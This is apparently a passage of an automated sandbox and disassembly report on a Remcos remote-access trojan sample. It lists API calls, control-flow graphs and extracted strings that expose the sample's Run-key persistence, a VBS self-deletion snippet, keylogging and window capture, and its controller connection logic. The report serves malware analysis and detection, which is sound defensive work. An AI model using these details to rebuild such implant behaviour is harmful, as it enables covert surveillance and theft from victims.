                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDE8
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,000CD783), ref: 000DBDF5
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDF8
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,000CD783), ref: 000DBE06
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4wECQoBvYC.exe,00000104), ref: 000CD790
                                                • Part of subcall function 000CFCBA: __EH_prolog.LIBCMT ref: 000CFCBF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                              • String ID: Access Level: $Administrator$C:\Users\user\Desktop\4wECQoBvYC.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                              • API String ID: 2830904901-2321554654
                                              • Opcode ID: 36638de06427716a24db0cb957e4a779490de377208d40f4aa829fedd5536de4
                                              • Instruction ID: 96bd5cba1f6f8e489f5fcfed6f7659c68d6b581bc0330908dcb4cb67b2e3798c
                                              • Opcode Fuzzy Hash: 36638de06427716a24db0cb957e4a779490de377208d40f4aa829fedd5536de4
                                              • Instruction Fuzzy Hash: 3032C771B043906BEB18B7749C57FFE269A9F93700F04486EB942AB2C3DF649D458362

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000D1699: TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                                • Part of subcall function 000D1699: WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,001342F8,?,pth_unenc), ref: 000CC013
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 000CC026
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,001342F8,?,pth_unenc), ref: 000CC056
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,001342F8,?,pth_unenc), ref: 000CC065
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C99A9,00000000,001342F8,pth_unenc,000CBF26,001342E0,001342F8,?,pth_unenc), ref: 000CAFC9
                                                • Part of subcall function 000CAFBA: UnhookWindowsHookEx.USER32(001340F8), ref: 000CAFD5
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C9993,00000000,?,pth_unenc), ref: 000CAFE3
                                                • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00125900,000CC07B,.vbs,?,?,?,?,?,001342F8), ref: 000DAB5F
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000000), ref: 000CC280
                                              • ExitProcess.KERNEL32 ref: 000CC287
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                              • API String ID: 3797177996-3018399277
                                              • Opcode ID: c33d9704fe5caec1d56bd800b5314f1d4383b175764430e893d318a4c449f120
                                              • Instruction ID: f28a6a26a382755389db1cc14cd65636a28cc098d4100721f3ba2e2512e2ff36
                                              • Opcode Fuzzy Hash: c33d9704fe5caec1d56bd800b5314f1d4383b175764430e893d318a4c449f120
                                              • Instruction Fuzzy Hash: 3E815031604250ABD718FB20E852FFF77A9AF96700F50452DF486972D3EF70AE498652

                                              Control-flow Graph

                                              control_flow_graph 586 d3fd4-d401f call c1faa call daa73 call c1faa call c1d64 call c1e8f call fa5e7 599 d402e-d407c call c1f66 call c1d64 call c1fbd call dafc3 call c4262 call c1d64 call cb125 586->599 600 d4021-d4028 Sleep 586->600 615 d407e-d40ed call c1d64 call c22f8 call c1d64 call c1e8f call c1d64 call c22f8 call c1d64 call c1e8f call c1d64 call c22f8 call c1d64 call c1e8f call c4101 599->615 616 d40f0-d418a call c1f66 call c1d64 call c1fbd call dafc3 call c1d64 * 2 call c85b4 call c27cb call c1eef call c1eea * 2 call c1d64 call c5422 599->616 600->599 615->616 669 d418c-d4198 616->669 670 d419a-d41a1 616->670 671 d41a6-d4242 call c541d call c4cbf call c5ce6 call c27cb call c1f66 call da686 call c1eea * 2 call c1d64 call c1e8f call c1d64 call c1e8f call d3f9a 669->671 670->671 698 d428f-d429d call c41f1 671->698 699 d4244-d428a WSAGetLastError call dbc76 call c4c9e call c1f66 call da686 call c1eea 671->699 704 d429f-d42c5 call c1f66 * 2 call da686 698->704 705 d42ca-d42df call c4915 call c428c 698->705 721 d4b54-d4b66 call c47eb call c20b4 699->721 704->721 720 d42e5-d4432 call c1d64 * 2 call c4cbf call c5ce6 call c27cb call c5ce6 call c27cb call c1f66 call da686 call c1eea * 4 call da96d call d3683 call c82dc call 100c51 call c1d64 call c1fbd call c22f8 call c1e8f * 2 call d265d 705->720 705->721 786 d4434-d4441 call c541d 720->786 787 d4446-d446d call c1e8f call d2513 720->787 735 d4b8e-d4b96 call c1d8c 721->735 736 d4b68-d4b88 call c1d64 call c1e8f call fa5e7 Sleep 721->736 735->616 736->735 786->787 793 d446f-d4471 787->793 794 d4474-d4abb call c3b40 call ccbf1 call dadee call daec8 call dad46 call c1d64 GetTickCount call dad46 call daca0 call dad46 * 2 call dac52 call daec8 * 5 call ce679 call daec8 call c27ec call c275c call c27cb call c275c call c27cb * 3 call c275c call c27cb call c5ce6 call c27cb call c5ce6 call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c5ce6 call c27cb * 5 call c275c call c27cb call c275c call c27cb * 7 call c275c call c4468 call c1eea * 50 call c1e13 call c1eea * 6 call c1e13 call c45d5 787->794 793->794 1039 d4ac0-d4ac7 794->1039 1040 d4ac9-d4ad0 1039->1040 1041 d4adb-d4ae2 1039->1041 1040->1041 1042 d4ad2-d4ad4 1040->1042 1043 d4aee-d4b20 call c5415 call c1f66 * 2 call da686 1041->1043 1044 d4ae4-d4ae9 call ca767 1041->1044 1042->1041 1055 d4b34-d4b4f call c1eea * 2 call c1e13 1043->1055 1056 d4b22-d4b2e CreateThread 1043->1056 1044->1043 1055->721 1056->1055
                                              APIs
                                              • Sleep.KERNEL32(00000000,00000029,001342F8,?,00000000), ref: 000D4028
                                              • WSAGetLastError.WS2_32 ref: 000D4249
                                              • Sleep.KERNEL32(00000000,00000002), ref: 000D4B88
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$ErrorLastLocalTime
                                              • String ID: | $%I64u$5.3.0 Pro$C:\Users\user\Desktop\4wECQoBvYC.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                              • API String ID: 524882891-3658575850
                                              • Opcode ID: 3c9fb38d2d4b205a3c24b2ad019662ff63de89fd1f6fc1eca9f511e0848954d1
                                              • Instruction ID: a1e264683e5d64ae40c89fe2fa9273518b234e5f5cdb05ef21cd18609f7bdc22
                                              • Opcode Fuzzy Hash: 3c9fb38d2d4b205a3c24b2ad019662ff63de89fd1f6fc1eca9f511e0848954d1
                                              • Instruction Fuzzy Hash: B1522D32A041245BDB18F774DDA2FEE73759FA2700F5041AEF80AA6293EF305E85CA55

                                              Control-flow Graph

                                              control_flow_graph 1063 c428c-c42ad connect 1064 c43e1-c43e5 1063->1064 1065 c42b3-c42b6 1063->1065 1068 c445f 1064->1068 1069 c43e7-c43f5 WSAGetLastError 1064->1069 1066 c42bc-c42bf 1065->1066 1067 c43da-c43dc 1065->1067 1071 c42eb-c42f5 call e0151 1066->1071 1072 c42c1-c42e8 call c4cbf call c1f66 call da686 1066->1072 1070 c4461-c4465 1067->1070 1068->1070 1069->1068 1073 c43f7-c43fa 1069->1073 1082 c4306-c4313 call e0373 1071->1082 1083 c42f7-c4301 1071->1083 1072->1071 1076 c43fc-c4437 call dbc76 call c4c9e call c1f66 call da686 call c1eea 1073->1076 1077 c4439-c443e 1073->1077 1076->1068 1079 c4443-c445c call c1f66 * 2 call da686 1077->1079 1079->1068 1096 c434c-c4357 call e0f34 1082->1096 1097 c4315-c4338 call c1f66 * 2 call da686 1082->1097 1083->1079 1109 c4389-c4396 call e02ea 1096->1109 1110 c4359-c4387 call c1f66 * 2 call da686 call e0592 1096->1110 1126 c433b-c4347 call e0191 1097->1126 1120 c43be-c43d7 CreateEventW * 2 1109->1120 1121 c4398-c43bb call c1f66 * 2 call da686 1109->1121 1110->1126 1120->1067 1121->1120 1126->1068
                                              APIs
                                              • connect.WS2_32(?,?,?), ref: 000C42A5
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,000C192B), ref: 000C43CB
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,000C192B), ref: 000C43D5
                                              • WSAGetLastError.WS2_32(?,?,?,000C192B), ref: 000C43E7
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                              • API String ID: 994465650-2151626615
                                              • Opcode ID: 48440025b215e024fbd830cb60954318bd8dba87294ace021d3ec86367cfbb6e
                                              • Instruction ID: 53b8b8394f2ee57093b1ee49f45f8e37657e8bcfaa6bd21a98b635f72476962f
                                              • Opcode Fuzzy Hash: 48440025b215e024fbd830cb60954318bd8dba87294ace021d3ec86367cfbb6e
                                              • Instruction Fuzzy Hash: 6B411A71B00651EBCB18B7798D6BFEDBA56BB82320780411DF40147A93EF61A96187E3

                                              Control-flow Graph

                                              control_flow_graph 1138 ca3f4-ca400 1139 ca402-ca406 1138->1139 1140 ca408-ca40c 1139->1140 1141 ca412-ca425 1139->1141 1140->1141 1142 ca608-ca610 1140->1142 1143 ca45c-ca482 Sleep GetForegroundWindow GetWindowTextLengthW call cb027 1141->1143 1144 ca427-ca439 call f3519 1141->1144 1147 ca487-ca489 1143->1147 1144->1143 1151 ca43b-ca45b call c1e52 call f38a5 call f34cf 1144->1151 1149 ca48f-ca4ba call c22f8 call c1e07 GetWindowTextW call cb131 1147->1149 1150 ca533-ca546 call cae58 call daca0 1147->1150 1149->1150 1175 ca4bc-ca4ef call caffa call c22f8 call c82a8 1149->1175 1165 ca54c 1150->1165 1166 ca5f1-ca5fa call c1e13 1150->1166 1151->1143 1170 ca550-ca554 1165->1170 1166->1139 1173 ca556-ca55a 1170->1173 1174 ca560-ca567 call daca0 1170->1174 1173->1174 1177 ca5ff-ca603 call c1e13 1173->1177 1183 ca57c-ca5ec call 100c51 call c1f66 call c4c9e call c5ce6 call dae08 call c9d58 call c1eea * 3 1174->1183 1184 ca569-ca57a Sleep 1174->1184 1192 ca4f1-ca500 call c82dc call ca876 1175->1192 1193 ca502-ca52e call cb0dd call c28cf call c9d58 call c1e13 1175->1193 1177->1142 1183->1166 1184->1170 1192->1150 1193->1150
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 000CA456
                                              • Sleep.KERNEL32(000001F4), ref: 000CA461
                                              • GetForegroundWindow.USER32 ref: 000CA467
                                              • GetWindowTextLengthW.USER32(00000000), ref: 000CA470
                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 000CA4A4
                                              • Sleep.KERNEL32(000003E8), ref: 000CA574
                                                • Part of subcall function 000C9D58: SetEvent.KERNEL32(?,?,00000000,000CA91C,00000000), ref: 000C9D84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                              • String ID: [${ User has been idle for $ minutes }$]
                                              • API String ID: 911427763-3954389425
                                              • Opcode ID: 5f4326d82fc5bb1d6fcbfcebf2f7735c4935d4491522b29a4d28620bb9830c53
                                              • Instruction ID: 4193bdf8575835751acc2cdf04f73fc0e249281d496006d74b7692921221ba05
                                              • Opcode Fuzzy Hash: 5f4326d82fc5bb1d6fcbfcebf2f7735c4935d4491522b29a4d28620bb9830c53
                                              • Instruction Fuzzy Hash: 5A51FE316086045BC718FB60D88AFEE77A6AF86714F50492DF846922D3DF709E85C693

                                              Control-flow Graph

                                              control_flow_graph 1218 cc89e-cc8c3 call c1e52 1221 cc9ed-cca13 call c1e07 GetLongPathNameW call c3b40 1218->1221 1222 cc8c9 1218->1222 1245 cca18-cca85 call c3b40 call ccc37 call c2860 * 2 call c1e13 * 5 1221->1245 1224 cc90f-cc916 call db15b 1222->1224 1225 cc9d8 1222->1225 1226 cc9c9-cc9ce call fac0f 1222->1226 1227 cc8da-cc8e8 call da74b call c1e18 1222->1227 1228 cc8fb-cc900 1222->1228 1229 cc9bb-cc9c0 1222->1229 1230 cc905-cc90a 1222->1230 1231 cc8d0-cc8d5 1222->1231 1232 cc9c2-cc9c7 1222->1232 1246 cc918-cc968 call c3b40 call fac0f call c3b40 call c2860 call c1e18 call c1e13 * 2 1224->1246 1247 cc96a-cc9b6 call c3b40 call fac0f call c3b40 call c2860 call c1e18 call c1e13 * 2 1224->1247 1233 cc9dd-cc9e2 call fac0f 1225->1233 1242 cc9d3-cc9d6 1226->1242 1249 cc8ed 1227->1249 1228->1233 1229->1233 1230->1233 1231->1233 1232->1233 1248 cc9e3-cc9e8 call c82d7 1233->1248 1242->1225 1242->1248 1254 cc8f1-cc8f6 call c1e13 1246->1254 1247->1249 1248->1221 1249->1254 1254->1221
                                              APIs
                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 000CCA04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                              • API String ID: 82841172-425784914
                                              • Opcode ID: 579acc916bf2ef469999a57afbbc092fa2fc7f4d907aae7a99b0f13c1674d989
                                              • Instruction ID: 0bc7824df1f559b9ecf784df13fb9e22906f29cae6e5767281e5b03d9e18762c
                                              • Opcode Fuzzy Hash: 579acc916bf2ef469999a57afbbc092fa2fc7f4d907aae7a99b0f13c1674d989
                                              • Instruction Fuzzy Hash: A1414572108240ABD214FB20DC56EFFB7A4AF91710F50452EF586D20E3EF709E59C666

                                              Control-flow Graph

                                              control_flow_graph 1352 da463-da4b7 call db15b call d2513 call c1eef call c1eea call cb9f2 1363 da4b9-da4c8 call d2513 1352->1363 1364 da4fa-da51a call c4ddc 1352->1364 1368 da4cd-da4e4 call c1e8f StrToIntA 1363->1368 1371 da4e6-da4ef call dc102 1368->1371 1372 da4f2-da4f5 call c1eea 1368->1372 1371->1372 1372->1364
                                              APIs
                                                • Part of subcall function 000DB15B: GetCurrentProcess.KERNEL32(?,?,?,000CC914,WinDir,00000000,00000000), ref: 000DB16C
                                                • Part of subcall function 000D2513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 000D2537
                                                • Part of subcall function 000D2513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 000D2554
                                                • Part of subcall function 000D2513: RegCloseKey.KERNEL32(?), ref: 000D255F
                                              • StrToIntA.SHLWAPI(00000000,0012BC48,?,00000000,00000000,00134358,00000003,Exe,00000000,0000000E,00000000,0012556C,00000003,00000000), ref: 000DA4D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue
                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 1866151309-2070987746
                                              • Opcode ID: 90c44cc45187dfa59f23898bd29bbcfa7b3a246272e0eee146ab2579cb72aede
                                              • Instruction ID: 2cd61ece7b4630d228423509368b1598ab778f7e0c2ae85c5e624aee58e355e6
                                              • Opcode Fuzzy Hash: 90c44cc45187dfa59f23898bd29bbcfa7b3a246272e0eee146ab2579cb72aede
                                              • Instruction Fuzzy Hash: B311E960A042115AD705B3A4ECABEFF776A9BD1300F400529F412E32D3EB649E5683B1

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(00001388), ref: 000C9E62
                                                • Part of subcall function 000C9D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C9E6F), ref: 000C9DCD
                                                • Part of subcall function 000C9D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,000C9E6F), ref: 000C9DDC
                                                • Part of subcall function 000C9D97: Sleep.KERNEL32(00002710,?,?,?,000C9E6F), ref: 000C9E09
                                                • Part of subcall function 000C9D97: CloseHandle.KERNEL32(00000000,?,?,?,000C9E6F), ref: 000C9E10
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 000C9E9E
                                              • GetFileAttributesW.KERNEL32(00000000), ref: 000C9EAF
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 000C9EC6
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 000C9F40
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00125900,?,00000000,00000000,00000000,00000000,00000000), ref: 000CA049
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                              • String ID:
                                              • API String ID: 3795512280-0
                                              • Opcode ID: 843b0848390b23511e3da31986f39f0cb4fb9f2655f1519742dc3a399f883753
                                              • Instruction ID: 3bc78addb357198194b155a250a3373168907249aefa220a8a9257dbf435ca2f
                                              • Opcode Fuzzy Hash: 843b0848390b23511e3da31986f39f0cb4fb9f2655f1519742dc3a399f883753
                                              • Instruction Fuzzy Hash: 52517C316043049BCB18FB70D866FFF7BAAAF96300F00052DF992A72D3DF6599459692

                                              Control-flow Graph

                                              APIs
                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • WaitForSingleObject.KERNEL32(?,00000000,LL,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000), ref: 000C450E
                                              • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000,?,?,?,?,?,000D4CE9), ref: 000C453C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventObjectSingleWaitsend
                                              • String ID: LL
                                              • API String ID: 3963590051-2551907876
                                              • Opcode ID: be1224bb59da6756acac28a2fdd6f7af34fa8f74e87aee50b4132a7137808c40
                                              • Instruction ID: 14d1be99b9b8e63e9963acd20a1ff2a010fa39b692afe88b204e6b4ed7652eb5
                                              • Opcode Fuzzy Hash: be1224bb59da6756acac28a2fdd6f7af34fa8f74e87aee50b4132a7137808c40
                                              • Instruction Fuzzy Hash: 2F213272900529BBDF05ABA4DC96EEE777CFF14350B00412DF916A2593EE34A914C6A0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1557 c98a5-c98cc call caffa 1560 c98ce-c98f1 call c1f66 call dae08 call ca876 call c1eea 1557->1560 1561 c98f6-c992e call c1f66 * 2 call da686 CreateThread 1557->1561 1560->1561 1575 c993c-c994b CreateThread call c1e13 1561->1575 1576 c9930-c993a CreateThread 1561->1576 1578 c9950-c9956 1575->1578 1576->1575
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,000C99A9,?,00000000,00000000), ref: 000C992A
                                              • CreateThread.KERNEL32(00000000,00000000,000C9993,?,00000000,00000000), ref: 000C993A
                                              • CreateThread.KERNEL32(00000000,00000000,000C99B5,?,00000000,00000000), ref: 000C9946
                                                • Part of subcall function 000CA876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                                • Part of subcall function 000CA876: wsprintfW.USER32 ref: 000CA905
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTimewsprintf
                                              • String ID: Offline Keylogger Started
                                              • API String ID: 465354869-4114347211
                                              • Opcode ID: 2b342cbcfcb24cab8426aa456ee954300db456fbaaf54a26f0bd83f997db7510
                                              • Instruction ID: f4e1b73890b7eaf9e00e6130818b236937091422306afda15f95c78e96864da0
                                              • Opcode Fuzzy Hash: 2b342cbcfcb24cab8426aa456ee954300db456fbaaf54a26f0bd83f997db7510
                                              • Instruction Fuzzy Hash: 7911E7B12002087ED320BB299C8BDEF7A5DDB823A4B40052DF84516583EE705E15C6F3
                                              APIs
                                              • GetLocalTime.KERNEL32(00000001,00133EE8,001345A8,00000000,?,?,?,?,?,000D4D8A,?,00000001), ref: 000C4946
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00133EE8,001345A8,00000000,?,?,?,?,?,000D4D8A,?,00000001), ref: 000C4994
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 000C49A7
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 000C495C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$EventLocalThreadTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 2532271599-1507639952
                                              • Opcode ID: 073b831aec8dcc6776424dde1b1f2d32e0b213a431bb7f68ba1588f170fb7489
                                              • Instruction ID: e035e8a1542617b1889b6aea217ce18db4a8701ca5f475900b3e2e2bb233c95b
                                              • Opcode Fuzzy Hash: 073b831aec8dcc6776424dde1b1f2d32e0b213a431bb7f68ba1588f170fb7489
                                              • Instruction Fuzzy Hash: D411C1319042A47ACB20AB7A9C59FDFBFACEB17364F44401EF40552682D7749485CBF2
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 000D26E1
                                              • RegSetValueExA.KERNEL32(?,00126748,00000000,?,00000000,00000000,001342F8,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2709
                                              • RegCloseKey.KERNEL32(?,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2714
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: 3123c3717bcf6a035aaf4456f0341037c05da08033008b850e4214814e942957
                                              • Instruction ID: f0ac7a6093cc17acfab3458bcf3d3680477709accfa0b5d51c4a3372c19c34bd
                                              • Opcode Fuzzy Hash: 3123c3717bcf6a035aaf4456f0341037c05da08033008b850e4214814e942957
                                              • Instruction Fuzzy Hash: DBF09072144214FBDB159FA0DD15EEE377CEF15740F108119F902A6291EA319E04DA60
                                              APIs
                                              • TerminateThread.KERNEL32(000C99A9,00000000,001342F8,pth_unenc,000CBF26,001342E0,001342F8,?,pth_unenc), ref: 000CAFC9
                                              • UnhookWindowsHookEx.USER32(001340F8), ref: 000CAFD5
                                              • TerminateThread.KERNEL32(000C9993,00000000,?,pth_unenc), ref: 000CAFE3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: TerminateThread$HookUnhookWindows
                                              • String ID: pth_unenc
                                              • API String ID: 3123878439-4028850238
                                              • Opcode ID: 916641fd7532f0d3116ee18d1b690ce9f6e85b75cacfd61859cf8f84b48c1706
                                              • Instruction ID: dc67f836095bdf10f8b75143978ea55acaec318ad233427a525f443d36c60047
                                              • Opcode Fuzzy Hash: 916641fd7532f0d3116ee18d1b690ce9f6e85b75cacfd61859cf8f84b48c1706
                                              • Instruction Fuzzy Hash: AAE01271319216EFD3241FD49C88DADBBFAEB45389314443DF7C286660C6714C85DB51
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 000C4778
                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 000C478C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 000C4797
                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 000C47A0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 3360349984-0
                                              • Opcode ID: 6e998e6cc421ccc566f532968a36ab8f0e78c020dfa3688fd1a9ef690cab0db5
                                              • Instruction ID: 3af5919e419a8c2e509b32904f2214cb310e2fe46f9456399d40c17f8ff54fed
                                              • Opcode Fuzzy Hash: 6e998e6cc421ccc566f532968a36ab8f0e78c020dfa3688fd1a9ef690cab0db5
                                              • Instruction Fuzzy Hash: C1418F71608340ABC714EB64CD65FFFB7E9AF96310F004A1DF89282293EB3499098762
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00125900,00000000,00000000,000CC267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 000DB5CE
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DB5EB
                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000DB5FF
                                              • CloseHandle.KERNEL32(00000000), ref: 000DB60C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
